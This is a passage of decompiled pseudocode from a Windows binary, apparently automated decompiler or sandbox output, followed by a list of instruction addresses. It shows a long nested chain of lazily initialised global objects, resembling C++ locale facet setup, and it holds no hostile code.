							_t778 =  *0x6de96db8; // 0x0
							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
							 *(_t814 - 0x10) = _t778;
							_t278 = E6DDB161C(0x6de96d6c);
							_t585 =  *((intOrPtr*)(_t814 + 8));
							_t759 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t278);
							__eflags = _t759;
							if(_t759 != 0) {
								L12:
								E6DDD66BA(_t814 - 0x14);
								return E6DDF0075(_t759);
							} else {
								__eflags = _t778;
								if(_t778 == 0) {
									_push( *((intOrPtr*)(_t814 + 8)));
									_push(_t814 - 0x10);
									__eflags = E6DDE0F1F(_t575, _t585, __edx, _t759, _t778) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t814 - 0x20);
										E6DDF3D74(_t814 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t575, _t759, _t778, 0x14);
										E6DDD6653(_t814 - 0x14, 0);
										_t779 =  *0x6de96dec; // 0x0
										 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
										 *(_t814 - 0x10) = _t779;
										_t291 = E6DDB161C(0x6de96d98);
										_t592 =  *((intOrPtr*)(_t814 + 8));
										_t760 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t291);
										__eflags = _t760;
										if(_t760 != 0) {
											L19:
											E6DDD66BA(_t814 - 0x14);
											return E6DDF0075(_t760);
										} else {
											__eflags = _t779;
											if(_t779 == 0) {
												_push( *((intOrPtr*)(_t814 + 8)));
												_push(_t814 - 0x10);
												__eflags = E6DDE0F87(_t575, _t592, __edx, _t760, _t779) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t814 - 0x20);
													E6DDF3D74(_t814 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t575, _t760, _t779, 0x14);
													E6DDD6653(_t814 - 0x14, 0);
													_t780 =  *0x6de96dbc; // 0x0
													 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
													 *(_t814 - 0x10) = _t780;
													_t304 = E6DDB161C(0x6de96d70);
													_t599 =  *((intOrPtr*)(_t814 + 8));
													_t761 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t304);
													__eflags = _t761;
													if(_t761 != 0) {
														L26:
														E6DDD66BA(_t814 - 0x14);
														return E6DDF0075(_t761);
													} else {
														__eflags = _t780;
														if(_t780 == 0) {
															_push( *((intOrPtr*)(_t814 + 8)));
															_push(_t814 - 0x10);
															__eflags = E6DDE0FEF(_t575, _t599, _t756, _t761, _t780) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t814 - 0x20);
																E6DDF3D74(_t814 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t575, _t761, _t780, 0x14);
																E6DDD6653(_t814 - 0x14, 0);
																_t781 =  *0x6de96df0; // 0x0
																 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																 *(_t814 - 0x10) = _t781;
																_t317 = E6DDB161C(0x6de96d9c);
																_t606 =  *((intOrPtr*)(_t814 + 8));
																_t762 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t317);
																__eflags = _t762;
																if(_t762 != 0) {
																	L33:
																	E6DDD66BA(_t814 - 0x14);
																	return E6DDF0075(_t762);
																} else {
																	__eflags = _t781;
																	if(_t781 == 0) {
																		_push( *((intOrPtr*)(_t814 + 8)));
																		_push(_t814 - 0x10);
																		__eflags = E6DDE1057(_t575, _t606, _t756, _t762, _t781) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t814 - 0x20);
																			E6DDF3D74(_t814 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t575, _t762, _t781, 0x14);
																			E6DDD6653(_t814 - 0x14, 0);
																			_t782 =  *0x6de96dc0; // 0x0
																			 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																			 *(_t814 - 0x10) = _t782;
																			_t330 = E6DDB161C(0x6de96d74);
																			_t613 =  *((intOrPtr*)(_t814 + 8));
																			_t763 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t330);
																			__eflags = _t763;
																			if(_t763 != 0) {
																				L40:
																				E6DDD66BA(_t814 - 0x14);
																				return E6DDF0075(_t763);
																			} else {
																				__eflags = _t782;
																				if(_t782 == 0) {
																					_push( *((intOrPtr*)(_t814 + 8)));
																					_push(_t814 - 0x10);
																					__eflags = E6DDE10BF(_t575, _t613, _t756, _t763, _t782) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t814 - 0x20);
																						E6DDF3D74(_t814 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t575, _t763, _t782, 0x14);
																						E6DDD6653(_t814 - 0x14, 0);
																						_t783 =  *0x6de96df8; // 0x0
																						 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																						 *(_t814 - 0x10) = _t783;
																						_t343 = E6DDB161C(0x6de96da4);
																						_t620 =  *((intOrPtr*)(_t814 + 8));
																						_t764 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t343);
																						__eflags = _t764;
																						if(_t764 != 0) {
																							L47:
																							E6DDD66BA(_t814 - 0x14);
																							return E6DDF0075(_t764);
																						} else {
																							__eflags = _t783;
																							if(_t783 == 0) {
																								_push( *((intOrPtr*)(_t814 + 8)));
																								_push(_t814 - 0x10);
																								__eflags = E6DDE1127(_t575, _t620, _t756, _t764, _t783) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t814 - 0x20);
																									E6DDF3D74(_t814 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t575, _t764, _t783, 0x14);
																									E6DDD6653(_t814 - 0x14, 0);
																									_t784 =  *0x6de96df4; // 0x0
																									 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																									 *(_t814 - 0x10) = _t784;
																									_t356 = E6DDB161C(0x6de96da0);
																									_t627 =  *((intOrPtr*)(_t814 + 8));
																									_t765 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t356);
																									__eflags = _t765;
																									if(_t765 != 0) {
																										L54:
																										E6DDD66BA(_t814 - 0x14);
																										return E6DDF0075(_t765);
																									} else {
																										__eflags = _t784;
																										if(_t784 == 0) {
																											_push( *((intOrPtr*)(_t814 + 8)));
																											_push(_t814 - 0x10);
																											__eflags = E6DDE11AB(_t575, _t627, _t756, _t765, _t784) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t814 - 0x20);
																												E6DDF3D74(_t814 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t575, _t765, _t784, 0x14);
																												E6DDD6653(_t814 - 0x14, 0);
																												_t785 =  *0x6de96dc8; // 0x0
																												 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																												 *(_t814 - 0x10) = _t785;
																												_t369 = E6DDB161C(0x6de96d7c);
																												_t634 =  *((intOrPtr*)(_t814 + 8));
																												_t766 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t369);
																												__eflags = _t766;
																												if(_t766 != 0) {
																													L61:
																													E6DDD66BA(_t814 - 0x14);
																													return E6DDF0075(_t766);
																												} else {
																													__eflags = _t785;
																													if(_t785 == 0) {
																														_push( *((intOrPtr*)(_t814 + 8)));
																														_push(_t814 - 0x10);
																														__eflags = E6DDE1230(_t575, _t634, _t756, _t766, _t785) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t814 - 0x20);
																															E6DDF3D74(_t814 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t575, _t766, _t785, 0x14);
																															E6DDD6653(_t814 - 0x14, 0);
																															_t786 =  *0x6de96dc4; // 0x0
																															 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																															 *(_t814 - 0x10) = _t786;
																															_t382 = E6DDB161C(0x6de96d78);
																															_t641 =  *((intOrPtr*)(_t814 + 8));
																															_t767 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t382);
																															__eflags = _t767;
																															if(_t767 != 0) {
																																L68:
																																E6DDD66BA(_t814 - 0x14);
																																return E6DDF0075(_t767);
																															} else {
																																__eflags = _t786;
																																if(_t786 == 0) {
																																	_push( *((intOrPtr*)(_t814 + 8)));
																																	_push(_t814 - 0x10);
																																	__eflags = E6DDE12B4(_t575, _t641, _t756, _t767, _t786) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t814 - 0x20);
																																		E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t575, _t767, _t786, 0x14);
																																		E6DDD6653(_t814 - 0x14, 0);
																																		_t787 =  *0x6de96dd8; // 0x0
																																		 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																		 *(_t814 - 0x10) = _t787;
																																		_t395 = E6DDB161C(0x6de96d84);
																																		_t648 =  *((intOrPtr*)(_t814 + 8));
																																		_t768 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t395);
																																		__eflags = _t768;
																																		if(_t768 != 0) {
																																			L75:
																																			E6DDD66BA(_t814 - 0x14);
																																			return E6DDF0075(_t768);
																																		} else {
																																			__eflags = _t787;
																																			if(_t787 == 0) {
																																				_push( *((intOrPtr*)(_t814 + 8)));
																																				_push(_t814 - 0x10);
																																				__eflags = E6DDE1339(_t575, _t648, _t756, _t768, _t787) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t814 - 0x20);
																																					E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t575, _t768, _t787, 0x14);
																																					E6DDD6653(_t814 - 0x14, 0);
																																					_t788 =  *0x6de96db0; // 0x0
																																					 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																					 *(_t814 - 0x10) = _t788;
																																					_t408 = E6DDB161C(0x6de96d64);
																																					_t655 =  *((intOrPtr*)(_t814 + 8));
																																					_t769 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t408);
																																					__eflags = _t769;
																																					if(_t769 != 0) {
																																						L82:
																																						E6DDD66BA(_t814 - 0x14);
																																						return E6DDF0075(_t769);
																																					} else {
																																						__eflags = _t788;
																																						if(_t788 == 0) {
																																							_push( *((intOrPtr*)(_t814 + 8)));
																																							_push(_t814 - 0x10);
																																							__eflags = E6DDE13A1(_t575, _t655, _t756, _t769, _t788) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t814 - 0x20);
																																								E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t575, _t769, _t788, 0x14);
																																								E6DDD6653(_t814 - 0x14, 0);
																																								_t789 =  *0x6de96ddc; // 0x0
																																								 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																								 *(_t814 - 0x10) = _t789;
																																								_t421 = E6DDB161C(0x6de96d88);
																																								_t662 =  *((intOrPtr*)(_t814 + 8));
																																								_t770 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t421);
																																								__eflags = _t770;
																																								if(_t770 != 0) {
																																									L89:
																																									E6DDD66BA(_t814 - 0x14);
																																									return E6DDF0075(_t770);
																																								} else {
																																									__eflags = _t789;
																																									if(_t789 == 0) {
																																										_push( *((intOrPtr*)(_t814 + 8)));
																																										_push(_t814 - 0x10);
																																										__eflags = E6DDE1409(_t575, _t662, _t756, _t770, _t789) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t814 - 0x20);
																																											E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t575, _t770, _t789, 0x14);
																																											E6DDD6653(_t814 - 0x14, 0);
																																											_t790 =  *0x6de96de0; // 0x0
																																											 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																											 *(_t814 - 0x10) = _t790;
																																											_t434 = E6DDB161C(0x6de96d8c);
																																											_t669 =  *((intOrPtr*)(_t814 + 8));
																																											_t771 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t434);
																																											__eflags = _t771;
																																											if(_t771 != 0) {
																																												L96:
																																												E6DDD66BA(_t814 - 0x14);
																																												return E6DDF0075(_t771);
																																											} else {
																																												__eflags = _t790;
																																												if(_t790 == 0) {
																																													_push( *((intOrPtr*)(_t814 + 8)));
																																													_push(_t814 - 0x10);
																																													__eflags = E6DDE1471(_t575, _t669, _t756, _t771, _t790) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t814 - 0x20);
																																														E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t575, _t771, _t790, 0x14);
																																														E6DDD6653(_t814 - 0x14, 0);
																																														_t791 =  *0x6de96dfc; // 0x0
																																														 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																														 *(_t814 - 0x10) = _t791;
																																														_t447 = E6DDB161C(0x6de96da8);
																																														_t676 =  *((intOrPtr*)(_t814 + 8));
																																														_t772 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t447);
																																														__eflags = _t772;
																																														if(_t772 != 0) {
																																															L103:
																																															E6DDD66BA(_t814 - 0x14);
																																															return E6DDF0075(_t772);
																																														} else {
																																															__eflags = _t791;
																																															if(_t791 == 0) {
																																																_push( *((intOrPtr*)(_t814 + 8)));
																																																_push(_t814 - 0x10);
																																																__eflags = E6DDE14EC(_t575, _t676, _t756, _t772, _t791) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t814 - 0x20);
																																																	E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t575, _t772, _t791, 0x14);
																																																	E6DDD6653(_t814 - 0x14, 0);
																																																	_t792 =  *0x6de96dcc; // 0x0
																																																	 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																	 *(_t814 - 0x10) = _t792;
																																																	_t460 = E6DDB161C(0x6de96d80);
																																																	_t683 =  *((intOrPtr*)(_t814 + 8));
																																																	_t773 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t460);
																																																	__eflags = _t773;
																																																	if(_t773 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t814 - 0x14);
																																																		return E6DDF0075(_t773);
																																																	} else {
																																																		__eflags = _t792;
																																																		if(_t792 == 0) {
																																																			_push( *((intOrPtr*)(_t814 + 8)));
																																																			_push(_t814 - 0x10);
																																																			__eflags = E6DDE1558(_t575, _t683, _t756, _t773, _t792) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t814 - 0x20);
																																																				E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t575, _t773, _t792, 0x14);
																																																				E6DDD6653(_t814 - 0x14, 0);
																																																				_t793 =  *0x6de96e00; // 0x0
																																																				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																				 *(_t814 - 0x10) = _t793;
																																																				_t473 = E6DDB161C(0x6de96dac);
																																																				_t690 =  *((intOrPtr*)(_t814 + 8));
																																																				_t774 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t473);
																																																				__eflags = _t774;
																																																				if(_t774 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t814 - 0x14);
																																																					return E6DDF0075(_t774);
																																																				} else {
																																																					__eflags = _t793;
																																																					if(_t793 == 0) {
																																																						_push( *((intOrPtr*)(_t814 + 8)));
																																																						_push(_t814 - 0x10);
																																																						__eflags = E6DDE15C4(_t575, _t690, _t756, _t774, _t793) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6DDB1438(_t814 - 0x20);
																																																							E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de383cf, _t575, _t774, _t793, 0x14);
																																																							E6DDD6653(_t814 - 0x14, 0);
																																																							_t794 =  *0x6de96dd0; // 0x0
																																																							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																							 *(_t814 - 0x10) = _t794;
																																																							_t486 = E6DDB161C(0x6de96d60);
																																																							_t697 =  *((intOrPtr*)(_t814 + 8));
																																																							_t775 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t486);
																																																							__eflags = _t775;
																																																							if(_t775 != 0) {
																																																								L124:
																																																								E6DDD66BA(_t814 - 0x14);
																																																								return E6DDF0075(_t775);
																																																							} else {
																																																								__eflags = _t794;
																																																								if(_t794 == 0) {
																																																									_push( *((intOrPtr*)(_t814 + 8)));
																																																									_push(_t814 - 0x10);
																																																									__eflags = E6DDE162A(_t575, _t697, _t756, _t775, _t794) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										_t701 = _t814 - 0x20;
																																																										E6DDB1438(_t701);
																																																										E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																																										asm("int3");
																																																										E6DDF00AC(0x6de3851f, _t575, _t775, _t794, 4);
																																																										_t795 = _t701;
																																																										 *(_t814 - 0x10) = _t795;
																																																										 *((intOrPtr*)(_t795 + 4)) =  *((intOrPtr*)(_t814 + 0xc));
																																																										_push( *((intOrPtr*)(_t814 + 0x14)));
																																																										_t259 = _t814 - 4;
																																																										 *_t259 =  *(_t814 - 4) & 0x00000000;
																																																										__eflags =  *_t259;
																																																										 *_t795 = 0x6de3c0c4;
																																																										 *((char*)(_t795 + 0x28)) =  *((intOrPtr*)(_t814 + 0x10));
																																																										E6DDE542F(_t575, _t701, _t756, _t775, _t795,  *_t259);
																																																										return E6DDF0075(_t795,  *((intOrPtr*)(_t814 + 8)));
																																																									} else {
																																																										_t775 =  *(_t814 - 0x10);
																																																										 *(_t814 - 0x10) = _t775;
																																																										 *(_t814 - 4) = 1;
																																																										E6DDD6FD3(__eflags, _t775);
																																																										 *0x6de3a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t775 + 4))))();
																																																										 *0x6de96dd0 = _t775;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t775 = _t794;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t774 =  *(_t814 - 0x10);
																																																							 *(_t814 - 0x10) = _t774;
																																																							 *(_t814 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t774);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t774 + 4))))();
																																																							 *0x6de96e00 = _t774;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t774 = _t793;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t773 =  *(_t814 - 0x10);
																																																				 *(_t814 - 0x10) = _t773;
																																																				 *(_t814 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t773);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 4))))();
																																																				 *0x6de96dcc = _t773;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t773 = _t792;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t772 =  *(_t814 - 0x10);
																																																	 *(_t814 - 0x10) = _t772;
																																																	 *(_t814 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t772);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t772 + 4))))();
																																																	 *0x6de96dfc = _t772;
																																																	goto L103;
																																																}
																																															} else {
																																																_t772 = _t791;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t771 =  *(_t814 - 0x10);
																																														 *(_t814 - 0x10) = _t771;
																																														 *(_t814 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t771);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t771 + 4))))();
																																														 *0x6de96de0 = _t771;
																																														goto L96;
																																													}
																																												} else {
																																													_t771 = _t790;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t770 =  *(_t814 - 0x10);
																																											 *(_t814 - 0x10) = _t770;
																																											 *(_t814 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t770);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t770 + 4))))();
																																											 *0x6de96ddc = _t770;
																																											goto L89;
																																										}
																																									} else {
																																										_t770 = _t789;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t769 =  *(_t814 - 0x10);
																																								 *(_t814 - 0x10) = _t769;
																																								 *(_t814 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t769);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t769 + 4))))();
																																								 *0x6de96db0 = _t769;
																																								goto L82;
																																							}
																																						} else {
																																							_t769 = _t788;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t768 =  *(_t814 - 0x10);
																																					 *(_t814 - 0x10) = _t768;
																																					 *(_t814 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t768);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 4))))();
																																					 *0x6de96dd8 = _t768;
																																					goto L75;
																																				}
																																			} else {
																																				_t768 = _t787;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t767 =  *(_t814 - 0x10);
																																		 *(_t814 - 0x10) = _t767;
																																		 *(_t814 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t767);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t767 + 4))))();
																																		 *0x6de96dc4 = _t767;
																																		goto L68;
																																	}
																																} else {
																																	_t767 = _t786;
																																	goto L68;
																																}
																															}
																														} else {
																															_t766 =  *(_t814 - 0x10);
																															 *(_t814 - 0x10) = _t766;
																															 *(_t814 - 4) = 1;
																															E6DDD6FD3(__eflags, _t766);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t766 + 4))))();
																															 *0x6de96dc8 = _t766;
																															goto L61;
																														}
																													} else {
																														_t766 = _t785;
																														goto L61;
																													}
																												}
																											} else {
																												_t765 =  *(_t814 - 0x10);
																												 *(_t814 - 0x10) = _t765;
																												 *(_t814 - 4) = 1;
																												E6DDD6FD3(__eflags, _t765);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t765 + 4))))();
																												 *0x6de96df4 = _t765;
																												goto L54;
																											}
																										} else {
																											_t765 = _t784;
																											goto L54;
																										}
																									}
																								} else {
																									_t764 =  *(_t814 - 0x10);
																									 *(_t814 - 0x10) = _t764;
																									 *(_t814 - 4) = 1;
																									E6DDD6FD3(__eflags, _t764);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t764 + 4))))();
																									 *0x6de96df8 = _t764;
																									goto L47;
																								}
																							} else {
																								_t764 = _t783;
																								goto L47;
																							}
																						}
																					} else {
																						_t763 =  *(_t814 - 0x10);
																						 *(_t814 - 0x10) = _t763;
																						 *(_t814 - 4) = 1;
																						E6DDD6FD3(__eflags, _t763);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t763 + 4))))();
																						 *0x6de96dc0 = _t763;
																						goto L40;
																					}
																				} else {
																					_t763 = _t782;
																					goto L40;
																				}
																			}
																		} else {
																			_t762 =  *(_t814 - 0x10);
																			 *(_t814 - 0x10) = _t762;
																			 *(_t814 - 4) = 1;
																			E6DDD6FD3(__eflags, _t762);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t762 + 4))))();
																			 *0x6de96df0 = _t762;
																			goto L33;
																		}
																	} else {
																		_t762 = _t781;
																		goto L33;
																	}
																}
															} else {
																_t761 =  *(_t814 - 0x10);
																 *(_t814 - 0x10) = _t761;
																 *(_t814 - 4) = 1;
																E6DDD6FD3(__eflags, _t761);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t761 + 4))))();
																 *0x6de96dbc = _t761;
																goto L26;
															}
														} else {
															_t761 = _t780;
															goto L26;
														}
													}
												} else {
													_t760 =  *(_t814 - 0x10);
													 *(_t814 - 0x10) = _t760;
													 *(_t814 - 4) = 1;
													E6DDD6FD3(__eflags, _t760);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t760 + 4))))();
													 *0x6de96dec = _t760;
													goto L19;
												}
											} else {
												_t760 = _t779;
												goto L19;
											}
										}
									} else {
										_t759 =  *(_t814 - 0x10);
										 *(_t814 - 0x10) = _t759;
										 *(_t814 - 4) = 1;
										E6DDD6FD3(__eflags, _t759);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t759 + 4))))();
										 *0x6de96db8 = _t759;
										goto L12;
									}
								} else {
									_t759 = _t778;
									goto L12;
								}
							}
						} else {
							_t758 =  *(_t814 - 0x10);
							 *(_t814 - 0x10) = _t758;
							 *(_t814 - 4) = 1;
							E6DDD6FD3(__eflags, _t758);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t758 + 4))))();
							 *0x6de96de8 = _t758;
							goto L5;
						}
					} else {
						_t758 = _t777;
						goto L5;
					}
				}
			}

0x6dddf183
0x6dddf183
0x6dddf18a
0x6dddf194
0x6dddf199
0x6dddf1a4
0x6dddf1a8
0x6dddf1ab
0x6dddf1b0
0x6dddf1b4
0x6dddf1b9
0x6dddf1bd
0x6dddf202
0x6dddf205
0x6dddf211
0x6dddf1bf
0x6dddf1c1
0x6dddf1c7
0x6dddf1cd
0x6dddf1d5
0x6dddf1d8
0x6dddf215
0x6dddf223
0x6dddf228
0x6dddf230
0x6dddf23a
0x6dddf23f
0x6dddf24a
0x6dddf24e
0x6dddf251
0x6dddf256
0x6dddf25f
0x6dddf261
0x6dddf263
0x6dddf2a8
0x6dddf2ab
0x6dddf2b7
0x6dddf265
0x6dddf265
0x6dddf267
0x6dddf26d
0x6dddf273
0x6dddf27b
0x6dddf27e
0x6dddf2bb
0x6dddf2c9
0x6dddf2ce
0x6dddf2d6
0x6dddf2e0
0x6dddf2e5
0x6dddf2f0
0x6dddf2f4
0x6dddf2f7
0x6dddf2fc
0x6dddf305
0x6dddf307
0x6dddf309
0x6dddf34e
0x6dddf351
0x6dddf35d
0x6dddf30b
0x6dddf30b
0x6dddf30d
0x6dddf313
0x6dddf319
0x6dddf321
0x6dddf324
0x6dddf361
0x6dddf36f
0x6dddf374
0x6dddf37c
0x6dddf386
0x6dddf38b
0x6dddf396
0x6dddf39a
0x6dddf39d
0x6dddf3a2
0x6dddf3ab
0x6dddf3ad
0x6dddf3af
0x6dddf3f4
0x6dddf3f7
0x6dddf403
0x6dddf3b1
0x6dddf3b1
0x6dddf3b3
0x6dddf3b9
0x6dddf3bf
0x6dddf3c7
0x6dddf3ca
0x6dddf407
0x6dddf415
0x6dddf41a
0x6dddf422
0x6dddf42c
0x6dddf431
0x6dddf43c
0x6dddf440
0x6dddf443
0x6dddf448
0x6dddf451
0x6dddf453
0x6dddf455
0x6dddf49a
0x6dddf49d
0x6dddf4a9
0x6dddf457
0x6dddf457
0x6dddf459
0x6dddf45f
0x6dddf465
0x6dddf46d
0x6dddf470
0x6dddf4ad
0x6dddf4bb
0x6dddf4c0
0x6dddf4c8
0x6dddf4d2
0x6dddf4d7
0x6dddf4e2
0x6dddf4e6
0x6dddf4e9
0x6dddf4ee
0x6dddf4f7
0x6dddf4f9
0x6dddf4fb
0x6dddf540
0x6dddf543
0x6dddf54f
0x6dddf4fd
0x6dddf4fd
0x6dddf4ff
0x6dddf505
0x6dddf50b
0x6dddf513
0x6dddf516
0x6dddf553
0x6dddf561
0x6dddf566
0x6dddf56e
0x6dddf578
0x6dddf57d
0x6dddf588
0x6dddf58c
0x6dddf58f
0x6dddf594
0x6dddf59d
0x6dddf59f
0x6dddf5a1
0x6dddf5e6
0x6dddf5e9
0x6dddf5f5
0x6dddf5a3
0x6dddf5a3
0x6dddf5a5
0x6dddf5ab
0x6dddf5b1
0x6dddf5b9
0x6dddf5bc
0x6dddf5f9
0x6dddf607
0x6dddf60c
0x6dddf614
0x6dddf61e
0x6dddf623
0x6dddf62e
0x6dddf632
0x6dddf635
0x6dddf63a
0x6dddf643
0x6dddf645
0x6dddf647
0x6dddf68c
0x6dddf68f
0x6dddf69b
0x6dddf649
0x6dddf649
0x6dddf64b
0x6dddf651
0x6dddf657
0x6dddf65f
0x6dddf662
0x6dddf69f
0x6dddf6ad
0x6dddf6b2
0x6dddf6ba
0x6dddf6c4
0x6dddf6c9
0x6dddf6d4
0x6dddf6d8
0x6dddf6db
0x6dddf6e0
0x6dddf6e9
0x6dddf6eb
0x6dddf6ed
0x6dddf732
0x6dddf735
0x6dddf741
0x6dddf6ef
0x6dddf6ef
0x6dddf6f1
0x6dddf6f7
0x6dddf6fd
0x6dddf705
0x6dddf708
0x6dddf745
0x6dddf753
0x6dddf758
0x6dddf760
0x6dddf76a
0x6dddf76f
0x6dddf77a
0x6dddf77e
0x6dddf781
0x6dddf786
0x6dddf78f
0x6dddf791
0x6dddf793
0x6dddf7d8
0x6dddf7db
0x6dddf7e7
0x6dddf795
0x6dddf795
0x6dddf797
0x6dddf79d
0x6dddf7a3
0x6dddf7ab
0x6dddf7ae
0x6dddf7eb
0x6dddf7f9
0x6dddf7fe
0x6dddf806
0x6dddf810
0x6dddf815
0x6dddf820
0x6dddf824
0x6dddf827
0x6dddf82c
0x6dddf835
0x6dddf837
0x6dddf839
0x6dddf87e
0x6dddf881
0x6dddf88d
0x6dddf83b
0x6dddf83b
0x6dddf83d
0x6dddf843
0x6dddf849
0x6dddf851
0x6dddf854
0x6dddf891
0x6dddf89f
0x6dddf8a4
0x6dddf8ac
